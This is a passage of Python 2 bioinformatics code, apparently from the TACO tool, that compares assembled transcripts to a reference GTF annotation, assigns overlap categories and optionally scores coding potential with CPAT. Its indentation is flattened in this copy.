'ref_gene_name', 'ref_source', 'ref_gene_type',
#'ref_locus',
'ref_length', 'ref_num_introns',
'shared_same_strand_bp', 'shared_opp_strand_bp',
'shared_introns', 'shared_splicing',
#'distance',
'category']
for attr in attrs:
v = getattr(self, attr)
feature.attrs[attr] = v
@staticmethod
def from_transcript(t, ref=None):
self = MatchStats()
self.transcript_id = t.attrs[GTFAttr.TRANSCRIPT_ID]
if GTFAttr.GENE_ID not in t.attrs.keys():
self.gene_id = t.attrs[GTFAttr.TRANSCRIPT_ID]
else:
self.gene_id = t.attrs[GTFAttr.GENE_ID]
self.locus = '%s:%d-%d[%s]' % (t.chrom, t.start, t.end, strand_int_to_str(t.strand))
self.length = t.length
self.num_introns = len(t.exons) - 1
if ref is not None:
self.ref_transcript_id = ref.attrs[GTFAttr.TRANSCRIPT_ID]
self.ref_gene_id = ref.attrs[GTFAttr.GENE_ID]
self.ref_locus = '%s:%d-%d[%s]' % (ref.chrom, ref.start, ref.end, strand_int_to_str(ref.strand))
self.ref_length = ref.length
self.ref_num_introns = len(ref.exons) - 1
self.ref_orig_gene_id = ref.attrs.get('orig_gene_id', self.ref_gene_id)
self.ref_source = ref.attrs.get('source', 'NA')
if 'gene_name' in ref.attrs:
self.ref_gene_name = ref.attrs['gene_name']
elif 'transcript_name' in ref.attrs:
self.ref_gene_name = ref.attrs['transcript_name']
else:
self.ref_gene_name = self.ref_gene_id
if 'gene_type' in ref.attrs:
self.ref_gene_type = ref.attrs['gene_type']
elif 'gene_biotype' in ref.attrs:
self.ref_gene_type = ref.attrs['gene_biotype']
elif 'transcript_type' in ref.attrs:
self.ref_gene_type = ref.attrs['transcript_type']
else:
self.ref_gene_type = 'None'
return self
@staticmethod
def choose_best(lst, transcript_id_to_source_dict=None):
hits = []
for m in lst:
total_introns = m.num_introns + m.ref_num_introns
if total_introns == 0:
intron_frac = 0.0
else:
intron_frac = float(m.shared_introns) / (total_introns - m.shared_introns)
same_strand_frac = float(m.shared_same_strand_bp) / (m.length + m.ref_length - m.shared_same_strand_bp)
opp_strand_frac = float(m.shared_opp_strand_bp) / (m.length + m.ref_length - m.shared_opp_strand_bp)
category_int = Category.to_int(m.category)
hits.append((int(m.shared_splicing), intron_frac,
same_strand_frac, opp_strand_frac,
int(category_int == Category.INTRONIC_SAME_STRAND),
int(category_int == Category.INTRONIC_OPP_STRAND),
int(category_int == Category.INTERLEAVING_SAME_STRAND),
int(category_int == Category.INTERLEAVING_OPP_STRAND),
int(category_int == Category.ENCOMPASSING_SAME_STRAND),
int(category_int == Category.ENCOMPASSING_OPP_STRAND),
int(category_int == Category.INTERGENIC),
-abs(m.distance), m))
# sort matches
max_value = (0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0)
max_match = None
if (transcript_id_to_source_dict == None):
for hit in hits:
if hit[:12] > max_value:
max_value = hit[:12]
max_match = hit[-1]
else:
# Use ENSEMBL in a tie situation
max_value = (0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0)
max_match = None
max_match_source = None
for hit in hits:
if hit[:12] >= max_value:
if (hit[:12] > max_value):
max_value = hit[:12]
max_match = hit[-1]
max_match_source = transcript_id_to_source_dict[hit[-1].ref_transcript_id]
elif (max_match != None) and (max_match_source != "ENSEMBL") and (transcript_id_to_source_dict[hit[-1].ref_transcript_id] == "ENSEMBL"):
max_value = hit[:12]
max_match = hit[-1]
max_match_source = "ENSEMBL"
return max_match
@staticmethod
def sort_genome(lst):
poslst = []
strands = []
for m in lst:
chrom, startend = m.ref_locus[:-3].split(':')
strands.append(m.ref_locus[-2])
start, end = map(int, startend.split('-'))
poslst.append((chrom, start, end, m))
reverse = any(x == '-' for x in strands)
poslst.sort(key=operator.itemgetter(0,1,2), reverse=reverse)
return [x[3] for x in poslst]
@staticmethod
def consensus(lst, transcript_id_to_source_dict=None):
if len(lst) == 0:
return None
# first check for read through transcripts involving multiple
# reference genes
same_strand_hits = collections.defaultdict(lambda: [])
for m in lst:
category_int = Category.to_int(m.category)
if category_int == Category.SAME_STRAND:
same_strand_hits[m.ref_gene_id].append(m)
# no same strand matches so don't need to worry about
# read-throughs or multiple gene types
if len(same_strand_hits) == 0:
return MatchStats.choose_best(lst)
# get consensus match from same strand overlapping genes
total_introns = lst[0].num_introns
total_length = lst[0].length
shared_introns = 0
shared_same_strand_bp = 0
hits = []
for genelst in same_strand_hits.itervalues():
m = MatchStats.choose_best(genelst, transcript_id_to_source_dict).copy()
m.ref_gene_type = ','.join(sorted(set(m.ref_gene_type for m in genelst)))
total_introns += m.ref_num_introns
total_length += m.ref_length
shared_introns += m.shared_introns
shared_same_strand_bp += m.shared_same_strand_bp
hits.append(m)
# sort reference genes by position
hits = MatchStats.sort_genome(hits)
# make a new MatchStats object
hit = hits[0].copy()
hit.ref_transcript_id = ','.join(x.ref_transcript_id for x in hits)
hit.ref_gene_id = ','.join(x.ref_gene_id for x in hits)
hit.ref_orig_gene_id = ','.join(x.ref_orig_gene_id for x in hits)
hit.ref_gene_name = ','.join(x.ref_gene_name for x in hits)
hit.ref_source = ','.join(x.ref_source for x in hits)
hit.ref_gene_type = ','.join(x.ref_gene_type for x in hits)
hit.ref_locus = ','.join(x.ref_locus for x in hits)
hit.ref_length = ','.join(str(x.ref_length) for x in hits)
hit.ref_num_introns = ','.join(str(x.ref_num_introns) for x in hits)
hit.shared_same_strand_bp = shared_same_strand_bp
hit.shared_opp_strand_bp = 0
hit.shared_introns = shared_introns
hit.shared_splicing = any(m.shared_splicing for m in hits)
hit.distance = 0
if len(same_strand_hits) > 1:
hit.category = Category.to_str(Category.READ_THROUGH)
return hit
def compare_locus(transcripts):
# store reference introns
# (strand,start,end) -> ids (set)
ref_intron_dict = collections.defaultdict(lambda: [])
ref_node_dict = collections.defaultdict(lambda: [])
ref_splicing_patterns = collections.defaultdict(lambda: [])
ref_dict = {}
# find the intron domains of the transcripts
boundaries = find_exon_boundaries(transcripts)
test_transcripts = []
for t in transcripts:
# print 'is_ref', t.attrs[GTFAttr.REF]
# separate ref and nonref transcripts
is_ref = bool(int(t.attrs[GTFAttr.REF]))
if is_ref:
# add to dict
ref_id = t.attrs[GTFAttr.TRANSCRIPT_ID]
ref_dict[ref_id] = t
# split exons that cross boundaries and get the
# nodes in the transcript path
for n in split_exons(t, boundaries):
ref_node_dict[n].append(t)
# add to introns
splicing_pattern = []
for start,end in t.iterintrons():
intron = (t.strand, start, end)
ref_intron_dict[intron].append(t)
splicing_pattern.append(intron)
# add to splicing patterns
if len(splicing_pattern) > 0:
ref_splicing_patterns[tuple(splicing_pattern)].append(t)
else:
test_transcripts.append(t)
# print test_transcripts
# index introns for fast intersection
intron_tree = IntervalTree()
for intron, refs in ref_intron_dict.iteritems():
strand, start, end = intron
intron_tree.insert_interval(Interval(start,end,strand=strand,value=refs))
# categorize transcripts
for t in test_transcripts:
# get transcript nodes and introns
nodes = list(split_exons(t, boundaries))
introns = []
for start,end in t.iterintrons():
introns.append((t.strand,start,end))
splicing_pattern = tuple(introns)
# keep list of all matching ref transcripts
matches = collections.defaultdict(lambda: Match())
# dict of reference transcripts -> category -> list of nodes
for n in nodes:
if n in ref_node_dict:
# look for reference transcripts that share this node
for ref in ref_node_dict[n]:
if cmp_strand(t.strand, ref.strand):
c = Category.SAME_STRAND
else:
c = Category.OPP_STRAND
ref_id = ref.attrs[GTFAttr.TRANSCRIPT_ID]
m = matches[ref_id]
m.nodes[c].append(n)
# look for reference introns that overlap this node
for hit in intron_tree.find(*n):
if cmp_strand(t.strand, hit.strand):
c = Category.INTRONIC_SAME_STRAND
else:
c = Category.INTRONIC_OPP_STRAND
for ref in hit.value:
ref_id = ref.attrs[GTFAttr.TRANSCRIPT_ID]
m = matches[ref_id]
m.nodes[c].append(n)
# dict of introns -> list of reference transcripts
for intron in introns:
if intron in ref_intron_dict:
for ref in ref_intron_dict[intron]:
ref_id = ref.attrs[GTFAttr.TRANSCRIPT_ID]
m = matches[ref_id]
m.introns.append(intron)
# check splicing pattern matches
if len(splicing_pattern) > 0:
if splicing_pattern in ref_splicing_patterns:
for ref in ref_splicing_patterns[splicing_pattern]:
ref_id = ref.attrs[GTFAttr.TRANSCRIPT_ID]
m = matches[ref_id]
m.splicing = True
# go through the matches for this transcript and determine
# the transcript category
match_stats = []
for ref_id, m in matches.iteritems():
ref = ref_dict[ref_id]
# calculate coverage
same_strand_bp = sum((n[1] - n[0]) for n in m.nodes[Category.SAME_STRAND])
opp_strand_bp = sum((n[1] - n[0]) for n in m.nodes[Category.OPP_STRAND])
# count shared introns
num_shared_introns = len(m.introns)
# decide category for this test/ref transcript pair
if m.splicing or (num_shared_introns > 0) or (same_strand_bp > 0):
c = Category.SAME_STRAND
elif (opp_strand_bp > 0):
c = Category.OPP_STRAND
else:
# count nodes of different types
num_same_strand = len(m.nodes[Category.SAME_STRAND])
num_opp_strand = len(m.nodes[Category.OPP_STRAND])
num_intronic_same_strand = len(m.nodes[Category.INTRONIC_SAME_STRAND])
num_intronic_opp_strand = len(m.nodes[Category.INTRONIC_OPP_STRAND])
assert num_same_strand == 0
assert num_opp_strand == 0
num_intronic = (num_intronic_same_strand +
num_intronic_opp_strand)
assert num_intronic > 0
if (num_intronic == len(nodes)):
# completely intronic
if num_intronic_same_strand > 0:
c = Category.INTRONIC_SAME_STRAND
else:
c = Category.INTRONIC_OPP_STRAND
else:
# interleaving means some nodes intronic and other intergenic
if num_intronic_same_strand > 0:
c = Category.INTERLEAVING_SAME_STRAND
else:
c = Category.INTERLEAVING_OPP_STRAND
# create a match object
ms = MatchStats.from_transcript(t, ref)
ms.shared_same_strand_bp = same_strand_bp
ms.shared_opp_strand_bp = opp_strand_bp
ms.shared_introns = num_shared_introns
ms.shared_splicing = m.splicing
ms.category = Category.to_str(c)
ms.distance = 0
match_stats.append(ms)
yield (t, match_stats)
def build_locus_trees(gtf_file):
transcripts = []
locus_cluster_trees = collections.defaultdict(lambda: ClusterTree(0,1))
for locus_transcripts in parse_gtf(open(gtf_file)):
for t in locus_transcripts:
is_ref = bool(int(t.attrs[GTFAttr.REF]))
if not is_ref:
continue
i = len(transcripts)
transcripts.append(t)
locus_cluster_trees[t.chrom].insert(t.start, t.end, i)
# build interval trees of loci
locus_trees = collections.defaultdict(lambda: IntervalTree())
for chrom, cluster_tree in locus_cluster_trees.iteritems():
for locus_start, locus_end, indexes in cluster_tree.getregions():
for i in indexes:
locus_transcripts = [transcripts[i] for i in indexes]
locus_trees[chrom].insert_interval(Interval(locus_start, locus_end, value=locus_transcripts))
return locus_trees
def find_nearest_transcripts(chrom, start, end, strand, locus_trees):
# first check for overlap
nearest_features = []
hits = locus_trees[chrom].find(start, end)
for hit in hits:
for t in hit.value:
if cmp_strand(t.strand, strand):
c = Category.ENCOMPASSING_SAME_STRAND
else:
c = Category.ENCOMPASSING_OPP_STRAND
nearest_features.append((t, c, 0))
# look left and right
left_hits = locus_trees[chrom].before(start, num_intervals=1, max_dist=MAX_LOCUS_DIST)
right_hits = locus_trees[chrom].after(end, num_intervals=1, max_dist=MAX_LOCUS_DIST)
# look for nearest hit
for hits in (left_hits, right_hits):
nearest_locus_hit = None
nearest_dist = MAX_LOCUS_DIST
for hit in hits:
dist = min(abs(start - hit.end), abs(hit.start - end))
if dist < nearest_dist:
nearest_dist = dist
nearest_locus_hit = hit
if nearest_locus_hit is not None:
for t in nearest_locus_hit.value:
dist = min(abs(start - t.end), abs(t.start - end))
nearest_features.append((t, Category.INTERGENIC, dist))
return nearest_features
def _parse_gtf_by_chrom(gtf_file):
current_chrom = None
exon_dict = collections.defaultdict(lambda: [])
transcript_dict = {}
for feature in GTFFeature.parse(open(gtf_file)):
if (feature.feature_type != "transcript") and (feature.feature_type != "exon"):
continue
if (current_chrom != feature.seqid):
if len(exon_dict) > 0:
yield current_chrom, transcript_dict, exon_dict
exon_dict = collections.defaultdict(lambda: [])
transcript_dict = {}
current_chrom = feature.seqid
t_id = feature.attrs[GTFAttr.TRANSCRIPT_ID]
if feature.feature_type == "transcript":
transcript_dict[t_id] = feature
elif feature.feature_type == "exon":
exon_dict[t_id].append(feature)
if len(exon_dict) > 0:
yield current_chrom, transcript_dict, exon_dict
def add_gtf_file(gtf_file, outfh, is_ref):
refval = '1' if is_ref else '0'
for chrom, transcript_dict, exon_dict in _parse_gtf_by_chrom(gtf_file):
logging.debug("\tfinished chrom %s %d features" % (chrom, len(exon_dict)))
# output reference transcripts
for t_id, features in exon_dict.iteritems():
# sort features (exons) by start position
features.sort(key=operator.attrgetter('start'))
# annotate exons as reference features
for f in features:
f.attrs[GTFAttr.REF] = refval
print >>outfh, str(f)
# transcript feature
if t_id in transcript_dict:
f = transcript_dict[t_id]
else:
f = GTFFeature()
f.seqid = features[0].seqid
f.source = features[0].source
f.feature_type = 'transcript'
f.start = features[0].start
f.end = features[-1].end
f.score = features[0].score
f.strand = features[0].strand
f.phase = '.'
f.attrs = features[0].attrs.copy()
if "exon_number" in f.attrs:
del f.attrs["exon_number"]
f.attrs[GTFAttr.REF] = refval
print >>outfh, str(f)
def impute_transcript_type(catint, length, gene_type, ref_gene_type):
if (catint == Category.SAME_STRAND or
catint == Category.READ_THROUGH):
# impute gene type
transcript_type = ref_gene_type
else:
if gene_type == 'protein_coding':
# don't change protein coding genes
transcript_type = gene_type
elif length < 250:
# categorize small RNA separately
transcript_type = 'misc_RNA'
else:
transcript_type = 'lincRNA'
return transcript_type
def parse_and_output_gtf_file(input_gtf_file, tmp_dir, is_ref, num_cores):
parallel_sort_cmd = False
with open(os.devnull, "w") as fnull:
cmdline = 'echo "2 1" | %s --parallel=2'
if subprocess.call(cmdline % 'gsort', stdout=fnull, stderr=fnull, shell=True) == 0:
parallel_sort_cmd = 'gsort'
if subprocess.call(cmdline % 'sort', stdout=fnull, stderr=fnull, shell=True) == 0:
parallel_sort_cmd = 'sort'
if not parallel_sort_cmd:
logging.warning('Command line "sort" command does not support '
'--parallel flag. For improved performance, consider '
'upgrading/installing the latest GNU coreutils to '
'enable parallel sort.')
args = ["sort"]
else:
logging.debug('Command line "sort" supports --parallel flag')
args = [parallel_sort_cmd, '--parallel=%d' % num_cores]
if tmp_dir is not None:
args.extend(["-T", tmp_dir])
args.extend(["-k1,1", input_gtf_file])
myenv = os.environ.copy()
myenv["LC_ALL"] = "C"
subprocess.call(args, stdout=open(os.path.join(tmp_dir, "input." + str(is_ref) + ".srt.gtf"), "w"), env=myenv)
curr_seqid = None
outfh = None
with open(os.path.join(tmp_dir, "input." + str(is_ref) + ".srt.gtf"), "r") as sorted_input_file:
for input_line in sorted_input_file:
if (input_line[0] == '#'):
continue
seqname, source, feature, start, end, score, strand, frame, attribute = input_line.replace("\n", "").split("\t")
seqname = seqname.translate(None, string.punctuation).replace(" ", "")
if (curr_seqid == seqname):
outfh.write(input_line)
else:
try:
outfh.close()
except:
pass
seq_id_folder = os.path.join(tmp_dir, str(seqname))
if not os.path.exists(seq_id_folder):
logging.debug("Creating tmp seqid directory '%s'" % (seq_id_folder))
os.makedirs(seq_id_folder)
outfh = open(os.path.join(seq_id_folder, "input." + str(is_ref) + ".srt.gtf"), "w")
outfh.write(input_line)
curr_seqid = seqname
def compare_assemblies_worker(input_queue):
while True:
output_dir = input_queue.get()
if (output_dir == None):
input_queue.task_done()
break
ref_file = os.path.join(output_dir, "input.1.srt.gtf")
test_file = os.path.join(output_dir, "input.0.srt.gtf")
if not (os.path.isfile(ref_file) and os.path.isfile(test_file)):
logging.info("Skipping: " + os.path.basename(output_dir) +
" because reference and test have 0 overlap")
input_queue.task_done()
continue
# merge step
merged_gtf_file = os.path.join(output_dir, "merged.gtf")
merged_sorted_gtf_file = os.path.splitext(merged_gtf_file)[0] + ".srt.gtf"
merge_done_file = os.path.join(output_dir, 'merged.done')
sort_done_file = os.path.join(output_dir, 'sort.done')
if not os.path.exists(merge_done_file):
# merge and sort ref/test gtf files
logging.info("Merging reference and test GTF files")
# make temporary file to store merged ref/test gtf files
with open(merged_gtf_file, "w") as fileh:
logging.info("Adding reference GTF file")
add_gtf_file(ref_file, fileh, True)
logging.info("Adding test GTF file")
add_gtf_file(test_file, fileh, False)
open(merge_done_file, 'w').close()
if not os.path.exists(sort_done_file):
logging.info("Sorting merged GTF file")
# create temp directory
tmp_dir = os.path.join(output_dir, 'tmp')
if not os.path.exists(tmp_dir):
logging.debug("Creating tmp directory '%s'" % (tmp_dir))
os.makedirs(tmp_dir)
sort_gtf(merged_gtf_file, merged_sorted_gtf_file, tmp_dir)
# cleanup
shutil.rmtree(tmp_dir)
open(sort_done_file, 'w').close()
# generate transcript_id to source dict
transcript_id_to_source_dict = {}
for feature in GTFFeature.parse(open(merged_sorted_gtf_file, "r")):
transcript_id_to_source_dict[feature.attrs['transcript_id']] = feature.source
# compare assemblies
overlapping_gtf_file = os.path.join(output_dir, 'overlapping.gtf')
intergenic_tmp_gtf_file = os.path.join(output_dir, 'intergenic.tmp.gtf')
overlapping_file = os.path.join(output_dir, 'overlapping.tsv')
# overlapping_consensus_file = os.path.join(output_dir, 'overlapping.consensus.tsv')
overlapping_done_file = os.path.join(output_dir, 'overlapping.done')
stats_file = os.path.join(output_dir, 'stats.txt')
stats_obj = GlobalStats()
num_intergenic = 0
if not os.path.exists(overlapping_done_file):
logging.info("Comparing assemblies")
gtf_fileh = open(overlapping_gtf_file, 'w')
tmp_gtf_fileh = open(intergenic_tmp_gtf_file, 'w')
# overlapping_fileh = open(overlapping_file, 'w')
# overlapping_consensus_fileh = open(overlapping_consensus_file, 'w')
for locus_transcripts in parse_gtf(open(merged_sorted_gtf_file)):
locus_chrom = locus_transcripts[0].chrom
locus_start = locus_transcripts[0].start
locus_end = max(t.end for t in locus_transcripts)
logging.debug("[LOCUS] %s:%d-%d %d transcripts" %
(locus_chrom, locus_start, locus_end,
len(locus_transcripts)))
for t, match_stats in compare_locus(locus_transcripts):
if len(match_stats) == 0:
# write intergenic transcripts to analyze separately
t.attrs['category'] = Category.to_str(Category.INTERGENIC)
for f in t.to_gtf_features(source='assembly'):
print >>tmp_gtf_fileh, str(f)
num_intergenic += 1
else:
# get consensus match information
consensus_match = MatchStats.consensus(match_stats, transcript_id_to_source_dict)
assert consensus_match is not None
t.attrs['category'] = consensus_match.category
# add gtf attributes and write
for f in t.to_gtf_features(source='assembly'):
if t.attrs['category'] != 'intergenic':
consensus_match.add_gtf_attributes(f)
print >>gtf_fileh, str(f)
# tab-delimited text output
# print >>overlapping_consensus_fileh, str(consensus_match)
# for ms in match_stats:
# print >>overlapping_fileh, str(ms)
# compute global statistics
stats_obj.compute(locus_transcripts)
logging.debug("Reporting global statistics")
with open(stats_file, 'w') as f:
print >>f, stats_obj.report()
gtf_fileh.close()
tmp_gtf_fileh.close()
# overlapping_fileh.close()
# overlapping_consensus_fileh.close()
open(overlapping_done_file, 'w').close()
# resolve intergenic transcripts
intergenic_gtf_file = os.path.join(output_dir, 'intergenic.gtf')
intergenic_file = os.path.join(output_dir, 'intergenic.tsv')
intergenic_best_file = os.path.join(output_dir, 'intergenic.best.tsv')
intergenic_done_file = os.path.join(output_dir, 'intergenic.done')
if not os.path.exists(intergenic_done_file):
logging.debug("Characterizing transcripts with complex overlap")
locus_trees = build_locus_trees(merged_sorted_gtf_file)
logging.debug('Finding nearest matches to intergenic transcripts')
gtf_fileh = open(intergenic_gtf_file, 'w')
# intergenic_fileh = open(intergenic_file, 'w')
intergenic_best_fileh = open(intergenic_best_file, 'w')
def wc(infile):
p = subprocess.Popen('wc -l %s' % infile, shell=True, stdout=subprocess.PIPE)
out, err = p.communicate()
return int(out.split()[0])
if wc(intergenic_tmp_gtf_file) != 0:
for locus_transcripts in parse_gtf(open(intergenic_tmp_gtf_file)):
for t in locus_transcripts:
# find nearest transcripts
nearest_transcripts = find_nearest_transcripts(t.chrom, t.start, t.end, t.strand, locus_trees)
match_stats = []
best_match = None
if len(nearest_transcripts) == 0:
best_match = MatchStats.from_transcript(t)
best_match.category = Category.to_str(Category.INTERGENIC)
match_stats.append(best_match)
else:
for ref,category,dist in nearest_transcripts:
# create a match object
ms = MatchStats.from_transcript(t, ref)
ms.shared_same_strand_bp = 0
ms.shared_opp_strand_bp = 0
ms.shared_introns = 0
ms.shared_splicing = False
ms.category = Category.to_str(category)
ms.distance = dist
match_stats.append(ms)
# choose the consensus match
best_match = MatchStats.choose_best(match_stats)
# add gtf attributes and write
for f in t.to_gtf_features(source='assembly'):
# best_match.add_gtf_attributes(f)
print >>gtf_fileh, str(f)
# write tab-delimited data
# print >>intergenic_best_fileh, str(best_match)
# for ms in match_stats:
# print >>intergenic_fileh, str(ms)
gtf_fileh.close()
# intergenic_fileh.close()
intergenic_best_fileh.close()
open(intergenic_done_file, 'w').close()
# merge overlapping and intergenic results
metadata_file = os.path.join(output_dir, 'metadata.txt')
metadata_consensus_file = os.path.join(output_dir, 'metadata.consensus.txt')
assembly_gtf_file = os.path.join(output_dir, 'assembly.cmp.gtf')
combine_done_file = os.path.join(output_dir, 'combine.done')
if not os.path.exists(combine_done_file):
logging.debug('Merging results')
# filenames = [overlapping_file, intergenic_file]
# with open(metadata_file, 'w') as outfile:
# print >>outfile, '\t'.join(MatchStats.header_fields())
# for fname in filenames:
# with open(fname) as infile:
# for line in infile:
# outfile.write(line)
filenames = [intergenic_best_file]
with open(metadata_consensus_file, 'w') as outfile:
print >>outfile, '\t'.join(MatchStats.header_fields())
for fname in filenames:
with open(fname) as infile:
for line in infile:
outfile.write(line)
filenames = [intergenic_gtf_file, overlapping_gtf_file]
with open(assembly_gtf_file, 'w') as outfile:
for fname in filenames:
with open(fname) as infile:
for line in infile:
outfile.write(line)
open(combine_done_file, 'w').close()
input_queue.task_done()
def compare_assemblies(ref_gtf_file, test_gtf_file, output_dir, output_final, cpat, num_cores):
# output files
if not os.path.exists(output_dir):
logging.debug('Creating tmp dir: %s' % (output_dir))
os.makedirs(output_dir)
# split input GTFs into chromosome-large GTFs
parse_and_output_gtf_file(ref_gtf_file, output_dir, 1, num_cores)
parse_and_output_gtf_file(test_gtf_file, output_dir, 0, num_cores)
input_queue = multiprocessing.JoinableQueue(maxsize = num_cores)
procs = []
for i in xrange(num_cores):
p = multiprocessing.Process(target=compare_assemblies_worker, args=(input_queue, ))
p.start()
procs.append(p)
for folder in [x[0] for x in os.walk(output_dir) if x[0] != output_dir]:
input_queue.put(folder)
for element in [None] * num_cores:
input_queue.put(element)
# close input queue
input_queue.join()
input_queue.close()
# join worker processes
for p in procs:
p.join()
# Merge all the chromosomes
assembly_gtf_file = os.path.join(output_dir, "assembly.cmp.gtf")
with open(assembly_gtf_file, "w") as outfh:
for folder in [x[0] for x in os.walk(output_dir)]:
assembled_chrom_gtf_file = os.path.join(folder, "assembly.cmp.gtf")
if not os.path.isfile(assembled_chrom_gtf_file):
continue
with open(assembled_chrom_gtf_file, "r") as inputfh:
for line in inputfh:
outfh.write(line)
if wc(assembly_gtf_file) == 0:
logging.error('Zero overlap for reference and test GTFs. '
'Ensure they are from the same species / genome.')
sys.exit()
# read compared assembly and add annotation status / final category
if cpat['run']:
logging.info('Running coding potential prediction')
#make bed file
assembly_bed_cpat_file = os.path.abspath(os.path.join(output_dir, 'assembly.cpat.bed'))
logging.debug('Converting GTF to BED for CPAT')
with open(assembly_bed_cpat_file, 'w') as f:
for transcripts in parse_gtf(open(assembly_gtf_file)):
for t in transcripts:
if 'gene_id' in t.attrs.keys():
name = '%s|%s' % (t.attrs['gene_id'], t.attrs['transcript_id'])
else:
name = t.attrs['transcript_id']
fields = write_bed(t.chrom, name, t.strand, 1000, t.exons)
print >>f, '\t'.join(fields)
cpat_tsv_file = os.path.abspath(os.path.join(output_dir, 'cpat.tsv'))
logging.info('Running CPAT')
cmd = [
cpat['exec'],
'-g', assembly_bed_cpat_file,
'-o', cpat_tsv_file,
'-x', cpat['hex'],
'-d', cpat['model'],
'-r', cpat['genome']
]
subprocess.call(' '.join(cmd), shell=True, cwd=output_dir)
cpat_dict = {}
fileh = open(cpat_tsv_file)
header = fileh.next().strip().split('\t')
tid_idx = 0
orf_idx = 2
prob_idx = 5
for line in fileh:
line = line.strip().split('\t')
tid = line[tid_idx].split('|')[1]
orf = line[orf_idx]
prob = line[prob_idx]
cpat_dict[tid] = (orf, prob)
#### RECATEGORIZE THE GENCODE ANNOTATION CATEOGRY #####
# ANNOTATED = ['same_strand', 'read_through']
# UNANNOTATED = ['opp_strand', 'intronic_same_strand', 'intronic_opp_strand',
# 'interleaving_same_strand', 'interleaving_opp_strand',
# 'encompassing_opp_strand', 'encompassing_same_strand',
# 'intergenic']
assembly_refcomp_file = os.path.join(output_final, 'assembly.refcomp.gtf')
final_gtf_done_file = os.path.join(output_dir, 'finalgtf.done')
if not os.path.exists(final_gtf_done_file):
logging.info('Generating final GTF file')
with open(assembly_refcomp_file, 'w') as gtf_final:
for locus_transcripts in parse_gtf(open(assembly_gtf_file)):
for t in locus_transcripts:
tid = t.attrs['transcript_id']
if cpat['run']:
orf, prob = cpat_dict[tid]
t.attrs['orf_size'] = orf
t.attrs['cpat_coding_prob'] = prob
catstr = t.attrs['category']
catint = Category.to_int(catstr)
length = t.length
gene_type = t.attrs.get('gene_type', None)
cat = t.attrs['category']
t.attrs['category_relative_detail'] = cat
if cat in ['same_strand', 'read_through']:
cat_rel = 'exonic_overlap'
elif cat == 'intergenic':
cat_rel = 'intergenic'
else:
cat_rel = 'intragenic'
t.attrs['category_relative'] = cat_rel
if 'ref_gene_type' in t.attrs.keys():
ref_gene_name = ','.join(set(t.attrs['ref_gene_name'].split(',')))
t.attrs['ref_gene_name'] = ref_gene_name
ref_gene_type = t.attrs['ref_gene_type']
ref_gene_types = set(ref_gene_type.split(','))
transcript_types = set(impute_transcript_type(catint, length, gene_type, x) for x in ref_gene_types)
t.attrs['ref_gene_type'] = ','.join(transcript_types)
transcript_categories = set(gencode_category_map(x) for x in transcript_types)
# sorted and join unique types/categories to make conglomerated category assignments
transcript_type = ','.join(sorted(transcript_types))
transcript_category = ','.join(sorted(transcript_categories))
# ref_cat_transform = GENCODE_CATEGORY_MAP[ref_gene]
transcript_category_final = transcript_category
if transcript_category in ['lncRNA', 'ncRNA', 'lncRNA,ncRNA']:
transcript_category_final = 'lncrna'
elif (',' in transcript_category) & (('protein' in transcript_category) | ('pseudo' in transcript_category)):
transcript_category_final = 'mixed_read_through'
t.attrs['annotation'] = 'annotated'
else:
if cpat['run']:
if float(prob) > cpat['cutoff']:
transcript_category_final = 'tucp'
else:
transcript_category_final = 'lncrna'
else:
transcript_category_final = 'lncrna'
t.attrs['annotation'] = 'unannotated'
t.attrs['category'] = transcript_category_final
if 'ref' in t.attrs.keys():
del t.attrs['ref']
if 'ref_num_introns' in t.attrs.keys():
del t.attrs['ref_num_introns']
if 'ref_source' in t.attrs.keys():
del t.attrs['ref_source']
for f in t.to_gtf_features(source='assembly'):
print >>gtf_final, str(f)
open(final_gtf_done_file, 'w').close()
logging.info('Generating metadata TSV file')
gtf_attrs = FULL_GTF_ATTRS
logging.debug("Reading GTF attributes to make metadata file")
metadata_dict = get_gtf_metadata(assembly_refcomp_file, gtf_attrs)
header_fields = ['transcript_id', 'chrom', 'start', 'end', 'strand',
'num_exons', 'transcript_length'] + gtf_attrs
assembly_metadata_file = os.path.join(output_final, 'assembly.metadata.tsv')
with open(assembly_metadata_file, 'w') as meta_final:
print >>meta_final, '\t'.join(header_fields)
for t_id in sorted(metadata_dict):
m = metadata_dict[t_id]
fields = [t_id, m.chrom, m.start, m.end, m.strand, m.num_exons, m.length]
for attr in gtf_attrs:
fields.append(getattr(m, attr))
print >>meta_final, '\t'.join(map(str,fields))
logging.info("Done")
def cpat_init(cpat_bool, genome, species):
#determine whether or not script is being run from a packaged executable
#this is used to identify where the data files are
if getattr( sys, 'frozen', False ) :
datadir = os.path.join(sys._MEIPASS, 'share','data')
else:
datadir = os.path.join(os.path.dirname(share.__file__), 'data')
#select OS to identify which CPAT executable to use
if sys.platform == 'darwin':
cpat_exec = os.path.join(datadir, 'cpat_execs', 'cpat_exec_mac')
elif (sys.platform == 'win32'):
raise OSError("Error: Windows is not supported")
exit(1)
else:
cpat_exec = os.path.join(datadir, 'cpat_execs', 'cpat_exec_linux')
hexamer = os.path.join(datadir, 'cpat_refs', '%s/hexamer.tab' % species)
model = os.path.join(datadir, 'cpat_refs', '%s/logitmodel.RData' % species)
if species == 'human':
cutoff = 0.5
else:
cutoff_file = get_data(os.path.join('cpat_refs', '%s/logitmodel.RData' % species))
cutoff = float(open(cutoff_file).next().strip().split(' :')[1])
cpat_dict = {
'run': cpat_bool,
'exec': cpat_exec,
'hex': hexamer,
'model': model,
'cutoff': cutoff,
'genome': genome
}
return cpat_dict
def main():
# parse command line
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("-v", "--verbose", action="store_true",
dest="verbose", default=False)
parser.add_argument("-o", "--output-dir", dest="output_dir",
default="taco_compare",
help='Directory for reference comparison output')
parser.add_argument("-p", "--num-processes", type=int, default=1,
dest="num_cores", help='Run tool in parallel with N processes. '
'(note: each core processes 1 chromosome) ')
parser.add_argument("--cpat", action='store_true', default=False,
help='Run CPAT tool to for coding potential scoring. '
'(CPAT function currently only supports '
'Human, Mouse, and Zebrafish) '
'(WARNING: The CPAT tool can take over an hour) ')
parser.add_argument("--cpat-species", dest='cpat_spec', default='human',
help='Select either: human, mouse, zebrafish')
parser.add_argument("--cpat-genome", dest='cpat_gen',
help='Provide a genome fasta for the genome used to '
'produce assemblies being compared. Required '
'if \"--cpat\" used. CPAT uses this '
'to obtain sequence for the provided transcripts')
